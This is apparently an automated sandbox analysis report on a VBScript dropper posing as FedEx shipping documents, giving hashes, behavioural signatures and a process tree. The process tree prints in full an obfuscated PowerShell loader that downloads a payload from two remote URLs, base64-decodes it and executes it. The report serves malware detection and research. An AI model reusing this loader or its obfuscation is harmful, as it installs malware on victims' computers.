Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 10:53
Static task
static1
Behavioral task
behavioral1
Sample
fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
Resource
win10v2004-20240704-en
General
-
Target
fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs
-
Size
101KB
-
MD5
20d1961bd8aa051dfb5632bf9be3e084
-
SHA1
75aafde8ec0657db8c60570c12620e0b7072f552
-
SHA256
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2
-
SHA512
3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f
-
SSDEEP
3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1
Malware Config
Signatures
-
Blocklisted process makes network request 64 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2512 WScript.exe 5 2464 powershell.exe 6 2464 powershell.exe 7 2464 powershell.exe 8 2464 powershell.exe 10 2464 powershell.exe 11 2464 powershell.exe 12 2464 powershell.exe 13 2464 powershell.exe 14 2464 powershell.exe 15 2464 powershell.exe 16 2464 powershell.exe 17 2464 powershell.exe 18 2464 powershell.exe 19 2464 powershell.exe 20 2464 powershell.exe 21 2464 powershell.exe 22 2464 powershell.exe 23 2464 powershell.exe 24 2464 powershell.exe 25 2464 powershell.exe 26 2464 powershell.exe 27 2464 powershell.exe 28 2464 powershell.exe 29 2464 powershell.exe 30 2464 powershell.exe 31 2464 powershell.exe 32 2464 powershell.exe 33 2464 powershell.exe 34 2464 powershell.exe 35 2464 powershell.exe 36 2464 powershell.exe 37 2464 powershell.exe 38 2464 powershell.exe 39 2464 powershell.exe 40 2464 powershell.exe 41 2464 powershell.exe 42 2464 powershell.exe 43 2464 powershell.exe 44 2464 powershell.exe 45 2464 powershell.exe 46 2464 powershell.exe 47 2464 powershell.exe 48 2464 powershell.exe 49 2464 powershell.exe 50 2464 powershell.exe 51 2464 powershell.exe 52 2464 powershell.exe 53 2464 powershell.exe 54 2464 powershell.exe 55 2464 powershell.exe 56 2464 powershell.exe 57 2464 powershell.exe 58 2464 powershell.exe 59 2464 powershell.exe 60 2464 powershell.exe 61 2464 powershell.exe 62 2464 powershell.exe 63 2464 powershell.exe 64 2464 powershell.exe 65 2464 powershell.exe 66 2464 powershell.exe 67 2464 powershell.exe 68 2464 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2464 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2512 wrote to memory of 2464 2512 WScript.exe powershell.exe PID 2512 wrote to memory of 2464 2512 WScript.exe powershell.exe PID 2512 wrote to memory of 2464 2512 WScript.exe powershell.exe PID 2464 wrote to memory of 112 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 112 2464 powershell.exe cmd.exe PID 2464 wrote to memory of 112 2464 powershell.exe cmd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fedex_air_waybill_shipping_documents_original_BL_CI&PL_09_07_2024_00000000_doc.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"3⤵PID:112
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b